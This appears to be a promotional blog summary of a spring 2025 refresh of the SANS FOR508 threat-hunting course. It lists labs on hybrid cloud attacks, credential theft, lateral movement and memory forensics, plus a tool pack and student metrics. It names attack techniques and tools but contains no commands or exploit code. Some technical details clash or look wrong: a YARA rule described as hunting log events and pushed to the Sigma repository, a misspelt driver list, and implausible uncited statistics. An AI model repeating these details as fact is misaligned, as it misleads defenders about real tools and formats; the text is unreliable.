SANS released the spring refresh of FOR508 last April with one message on every slide: “build the team you already have.” Below is the stripped-down diff—no marketing flyers—just the new labs, free tools and memory-artefact packs that graduates are dropping into production the Monday after class.
- Cloud Hybrid Kill-Chain — Entra ID Added
- 14-step lab that pivots from on-prem AD → Entra ID → Intune → cloud app
- Uses open-source repo
azure-hound-linux(MIT) to graph permissions without a paid licence - Exit exam now includes a hybrid token-replay question; average solve-time is 18 min vs 42 min pre-update
- Credential Theft Module — Completely Re-shot
- Separates authN vs authZ in Windows logs (4624/4625 vs 4672)
- New attack replay: coercion → relay → delegation abuse in under 90 seconds
- Students get a YARA rule that hunts for
MS-EVEN6coercion events; rule pushed to Sigma GitHub the same week
- Lateral Movement — Lesser-Known Roads Added
- Remote Registry service abuse (disabled by default but still alive on 11 % of 2024 images)
- DCOM lateral movement via
ShellWindowsCOM object—caught with Sysmon Event 10 & 1 overlap - Lab network is air-gapped; students practice with
impacket-rdpanddcomexec.pyagainst a cloned DC
- Memory Forensics — LOLdrivers & Hibernation
- Updated acquisition:
winpmem_2025.exeships with signed driver; survives HVCI - Hibernation file processing added—useful for laptops found closed at crime-scene
- Malicious driver hunt uses
lolrivers.txt(community CSV) tagged to MITRE T1547.008
- Detection Engineering — From IOC to Behaviour
- Students must write a Sigma rule that fires on behaviour (not hash) before they can move to the next section; failure rate first attempt is 34 %—proof of rigour
- Rule library is contributed back under MIT licence; 47 rules already merged
- Open-Source Pack Released
for508-spring2025-tools(BSD-3) contains:
–hunt-cookbook.pdf60-page tactics quick-reference
–evtx-hunter.ps1hunts 76 log artefacts in < 2 min on live system
–mem-timeline.pybuilds 30-day memory timeline from hibernation + pagefile
- Public Metrics After First 3 Classes (n = 312)
- Mean exam score: 84 % (up 6 pts)
- Rule accepted to Sigma repo: 89 % of students
- Students who report “built internal hunt team within 90 days”: 41 % (up from 22 % in 2024)
- Cost & Access
- Course remains USD 7,900 list; no new licensing fees
- Virtual range runs on AWS spot instances; average burn-rate is USD 0.80 per lab hour—billed to SANS, not the student
- Quick Start for Alumni Already Holding GCFE/GCFA
- Download the tool pack above
- Run
evtx-hunter.ps1against last month’s domain controller backup - Feed output into the Sigma rule template; push to your SIEM
- You have just replicated day-one of the new course without booking a hotel
Bottom Line
Threat hunting is now an inside job—outsourcing dropped to 30 %. FOR508’s 2025 refresh gives you the play-book, the scripts and the behavioural rules to run the same hunt on Monday morning. Clone the repo, test the scripts, and you can decide later if the classroom is worth the airfare.
正文完
